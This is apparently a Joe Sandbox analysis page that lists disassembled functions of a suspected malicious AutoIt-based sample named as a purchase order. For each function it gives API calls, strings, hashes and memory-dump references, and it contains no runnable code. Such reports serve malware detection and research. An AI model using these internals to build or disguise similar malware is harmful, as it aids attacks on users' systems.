Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: 8!L$\$\Include\
API String ID: 3592542968-1316215114
Opcode ID: fa8a9e684f192d5f0ec16de0341574a8dd1ab902b51a2da00cf2f8cb0f237409
Instruction ID: 69193c1904a342b4ff2347d59ce207587477678b7e20525fd4ba8b54dc9425ab
Opcode Fuzzy Hash: fa8a9e684f192d5f0ec16de0341574a8dd1ab902b51a2da00cf2f8cb0f237409
Instruction Fuzzy Hash: ED514CB54043409FC754EF56EA818AAB7F4BA49304B48453FF649A32A1DFF89608CB5E

Function 004051AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040522F
_wcscpy.LIBCMT ref: 00405283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00405293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00473CB0

Strings

Line: , xrefs: 00473CD9

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 5a93062e463b5291ae8202b0ac4106f82042ada94cfdc4f28ea77096baa7610a
Instruction ID: af1427f6d41ff21884d985d4e629e724e95b45f0675a28509f4e8d353c660326
Opcode Fuzzy Hash: 5a93062e463b5291ae8202b0ac4106f82042ada94cfdc4f28ea77096baa7610a
Instruction Fuzzy Hash: 2D319E71508340AED361EB61EC46FEB77D8AF45304F00452FF585A61E2DB78A5488F9E

Function 00404139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 004041A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004039FE,?,00000001), ref: 004041DB

_free.LIBCMT ref: 004736B7
_free.LIBCMT ref: 004736FE

Part of subcall function 0040C833: __wsplitpath.LIBCMT ref: 0040C93E
Part of subcall function 0040C833: _wcscpy.LIBCMT ref: 0040C953
Part of subcall function 0040C833: _wcscat.LIBCMT ref: 0040C968
Part of subcall function 0040C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0040C978

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00473491
Bad directive syntax error, xrefs: 004736E4

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: 99c49800dbdedcd83fc2104d7b9e6376354b04efecdf3c2b528a79f958a17f32
Instruction ID: a5069b7475330fe088817bec80de3aee8e84fa7b19bb18b6e651e427e71290f0
Opcode Fuzzy Hash: 99c49800dbdedcd83fc2104d7b9e6376354b04efecdf3c2b528a79f958a17f32
Instruction Fuzzy Hash: 91916071910219AFCF14EFA5CC919EEB7B4BF14314F10842FF415AB291DB38AA45DB98

Function 00DFB908 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00DFB7F8: Sleep.KERNEL32(000001F4), ref: 00DFB809

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00DFBA11

Strings

AIPT2PP3VL, xrefs: 00DFBA91, 00DFBA94

Memory Dump Source

Source File: 00000000.00000002.1695136814.0000000000DF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DF9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_df9000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CreateFileSleep
String ID: AIPT2PP3VL
API String ID: 2694422964-1836402105
Opcode ID: 2ff87d6b149ec29ddf084472065d22551de924f79c27af9c51f7c7640728e76f
Instruction ID: c3270c58a07b8e9da9d5baa4aeb5302662adf55f041287304f1e9e0dff280be4
Opcode Fuzzy Hash: 2ff87d6b149ec29ddf084472065d22551de924f79c27af9c51f7c7640728e76f
Instruction Fuzzy Hash: D1516B31D1424DEAEB10DBA4C815BEFBB78EF48310F1081A9A608BB2C0D7B55B45CBA5

Function 004040E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00473725
GetOpenFileNameW.COMDLG32 ref: 0047376F

Part of subcall function 0040660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004053B1,?,?,004061FF,?,00000000,00000001,00000000), ref: 0040662F

Part of subcall function 004040A7: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004040C6

Strings

t3K, xrefs: 00473745
X, xrefs: 0047373E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X$t3K
API String ID: 3777226403-2811000538
Opcode ID: b93b0c1c5738115443a6aa44457fd713ed33a969696249c1967a6bebbd69b3da
Instruction ID: 9ad05c4a51ad5a7aed7e064f7d04d0a32a4adfcb21fa2545d4e7afce16479d8e
Opcode Fuzzy Hash: b93b0c1c5738115443a6aa44457fd713ed33a969696249c1967a6bebbd69b3da
Instruction Fuzzy Hash: C62196B1A101989BCB01DF95D845BDE7BF89F89305F00806FE505BB281DBBC5A898F69

Function 004234AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 004234FE

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00423539
__wopenfile.LIBCMT ref: 00423549

Strings

<G, xrefs: 004234CD, 004234F0, 004234FC

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: e12d3699157ed522373a9c6598b4b5b430320c1e0cdd8312ea3d440cb485dafa
Instruction ID: 89deda876913a1a8087184d99beb7911a355133d9146999c29091959b336447a
Opcode Fuzzy Hash: e12d3699157ed522373a9c6598b4b5b430320c1e0cdd8312ea3d440cb485dafa
Instruction Fuzzy Hash: 3A113D70B00235ABDB11BF73BC4266F36B4AF05354B95895BE414C7281EB3CCA419779

Function 0041D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0041D28B,SwapMouseButtons,00000004,?), ref: 0041D2BC
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0041D28B,SwapMouseButtons,00000004,?,?,?,?,0041C865), ref: 0041D2DD
RegCloseKey.KERNEL32(00000000,?,?,0041D28B,SwapMouseButtons,00000004,?,?,?,?,0041C865), ref: 0041D2FF

Strings

Control Panel\Mouse, xrefs: 0041D2BA

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 2ab266b0ece269c1616b8b7b238a33a0ffe188f22c2a12cea562aeff6cf6730d
Instruction ID: 0cd1190555930828b12ec140491f6cbda27ebd5e95af48670a4612518318c08c
Opcode Fuzzy Hash: 2ab266b0ece269c1616b8b7b238a33a0ffe188f22c2a12cea562aeff6cf6730d
Instruction Fuzzy Hash: EC117CB5A11208BFDB118F64CC84EEF7BB8EF05744F10486AE801D7250D735AE819B68

Function 0044C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00404517: _fseek.LIBCMT ref: 0040452F

Part of subcall function 0044C56D: _wcscmp.LIBCMT ref: 0044C65D
Part of subcall function 0044C56D: _wcscmp.LIBCMT ref: 0044C670

_free.LIBCMT ref: 0044C4DD
_free.LIBCMT ref: 0044C4E4
_free.LIBCMT ref: 0044C54F

Part of subcall function 00421C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00427A85), ref: 00421CB1
Part of subcall function 00421C9D: GetLastError.KERNEL32(00000000,?,00427A85), ref: 00421CC3

_free.LIBCMT ref: 0044C557

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
Instruction ID: 674951708a286eb07b9171a8a69b16656f8ff281423f2ed36709ed89db711628
Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
Instruction Fuzzy Hash: 7E515FF5A04218AFDB149F65DC81AADBBB9EF48304F1000AEB219A3291DB755A80CF5D

Function 00BEB180 Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00BEB2BA
WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00BEB2E0

Memory Dump Source

Source File: 00000000.00000002.1694228884.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: 6f4606d460b4cd538ff3383d96dbb119d7132e40ae93c02b744eadd2db674cd8
Instruction ID: 34e08a23bfa058d19e7331af50bbf39a5b436fc836aec96852a20f4346898835
Opcode Fuzzy Hash: 6f4606d460b4cd538ff3383d96dbb119d7132e40ae93c02b744eadd2db674cd8
Instruction Fuzzy Hash: E231726040C3C09ED7118B678855F2FBFE0EF92725F5885CDE5D49A2A1D3B888089797

Function 0041EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041EBB2

Part of subcall function 004051AF: _memset.LIBCMT ref: 0040522F
Part of subcall function 004051AF: _wcscpy.LIBCMT ref: 00405283
Part of subcall function 004051AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00405293

KillTimer.USER32(?,00000001,?,?), ref: 0041EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0041EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00473C88

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: df4f371beef39f263f04c1f7b813fdb3b3131aef762958de6741ae884a2b81f1
Instruction ID: b49518ba9000ce9ca09009b9798321fdbb3bf5267274904d3eb6e3e3661bd638
Opcode Fuzzy Hash: df4f371beef39f263f04c1f7b813fdb3b3131aef762958de6741ae884a2b81f1
Instruction Fuzzy Hash: 3521DD759057949FE7339B248C55FE7BFEC9B01308F04045ED68E66282D3781A858B5A

Function 00DFA548 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 00DFA58D
ExitProcess.KERNEL32(00000000), ref: 00DFA5AC

Strings

D, xrefs: 00DFA559

Memory Dump Source

Source File: 00000000.00000002.1695136814.0000000000DF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DF9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_df9000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
Instruction ID: 2f2ae398aeee6321f7fa008d4ca40b4ec2510d25a6f6b3c6a05f77e8e7ca72b3
Opcode Fuzzy Hash: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
Instruction Fuzzy Hash: BFF0ECB154024CABDB60EFE4CC49FFE7778BF48701F54C509BB1A9A180DB7496089B61

Function 0044C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0044C72F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0044C746

Strings

aut, xrefs: 0044C740

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 3d2e6316c8f3a47ad6dc190deda9ae84468cfd82ede16fcca1fefbdffebd8a43
Instruction ID: 208516855a03f89cd35dcfacd4225edbf1aaece69b415c0056d3480ee9c56843
Opcode Fuzzy Hash: 3d2e6316c8f3a47ad6dc190deda9ae84468cfd82ede16fcca1fefbdffebd8a43
Instruction Fuzzy Hash: 81D05E7190030EBBDB10AB94DC0EFCA776C9700704F0005A17650A50F1DAB4E6998B69

Function 0045F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ed629ad32a379d639f331eff032c05424b95fb1a9cffe0e5a96631345af4bda
Instruction ID: b3827f22a9b40117375a449595afde1625f4abf3f7e4d7e9dd60fbd75d6536de
Opcode Fuzzy Hash: 0ed629ad32a379d639f331eff032c05424b95fb1a9cffe0e5a96631345af4bda
Instruction Fuzzy Hash: AEF169716083019FC710DF25C881B5EB7E5BF88318F14892EF9959B392DB78E949CB86

Function 00C07DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32 ref: 00C07E0F

Memory Dump Source

Source File: 00000000.00000002.1694228884.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 1a906e18edc66863e0b3ce445edaaa111c3616c6b2c772a09ef418c907bdb345
Instruction ID: d34738100eb6d8623160a14dc3c6a8aec8dfd10a0c9a663228d067221170774e
Opcode Fuzzy Hash: 1a906e18edc66863e0b3ce445edaaa111c3616c6b2c772a09ef418c907bdb345
Instruction Fuzzy Hash: CB212534E5D3446BDA3D67149C06BB93A382F61B10F88869AF5E8160D2D5643F08C273

Function 00404FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00405022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 004050CB

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 94f964a7d359a6a34d91c6fa7c9c6613ddd0a77c5e15072ef58f361c02b8a933
Instruction ID: 780e9372986578fb2a70c0f07c3d76a13c8ca938962568f86c04eb55268c7895
Opcode Fuzzy Hash: 94f964a7d359a6a34d91c6fa7c9c6613ddd0a77c5e15072ef58f361c02b8a933
Instruction Fuzzy Hash: F231A0B1505701CFD721DF25D840A9BBBE8FF49309F00093FE59A92292E7796944CF9A

Function 0042395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00423973

Part of subcall function 004281C2: __NMSG_WRITE.LIBCMT ref: 004281E9
Part of subcall function 004281C2: __NMSG_WRITE.LIBCMT ref: 004281F3

__NMSG_WRITE.LIBCMT ref: 0042397A

Part of subcall function 0042821F: GetModuleFileNameW.KERNEL32(00000000,004C0312,00000104,00000000,00000001,00000000), ref: 004282B1
Part of subcall function 0042821F: ___crtMessageBoxW.LIBCMT ref: 0042835F

Part of subcall function 00421145: ___crtCorExitProcess.LIBCMT ref: 0042114B
Part of subcall function 00421145: ExitProcess.KERNEL32 ref: 00421154

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

RtlAllocateHeap.NTDLL(00CC0000,00000000,00000001,00000001,00000000,?,?,0041F507,?,0000000E), ref: 0042399F

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 037137f005a41d3e7f23448d6c867b3c8b4c2edbc04952c02118ab1723008725
Instruction ID: 55fc1677af57a8a7660136eab561fac32ed193775503e2d42985e710cb399e89
Opcode Fuzzy Hash: 037137f005a41d3e7f23448d6c867b3c8b4c2edbc04952c02118ab1723008725
Instruction Fuzzy Hash: 9701D6B13452319AE6113F36FC42B2F23689F82729BA0002FF505D7292DBBC9D80866D

Function 0044C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0044C385,?,?,?,?,?,00000004), ref: 0044C6F2
SetFileTime.KERNEL32(00000000,?,00000000,?,?,0044C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0044C708
CloseHandle.KERNEL32(00000000,?,0044C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0044C70F

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: a222b55bfb7e3c9122e2c3c1e0a00ac8846e0e3ba4c61acd4eec9770901b3ece
Instruction ID: 494393b69a2909d6cdb43eca47a58c7b459d0d0b41777f9665b8bdb17d821ec9
Opcode Fuzzy Hash: a222b55bfb7e3c9122e2c3c1e0a00ac8846e0e3ba4c61acd4eec9770901b3ece
Instruction Fuzzy Hash: D1E08632542214B7E7212B54AC4DFCE7B18AF05771F104524FB14691E097B12911879C

Function 0044BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044BB72

Part of subcall function 00421C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00427A85), ref: 00421CB1
Part of subcall function 00421C9D: GetLastError.KERNEL32(00000000,?,00427A85), ref: 00421CC3

_free.LIBCMT ref: 0044BB83
_free.LIBCMT ref: 0044BB95

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
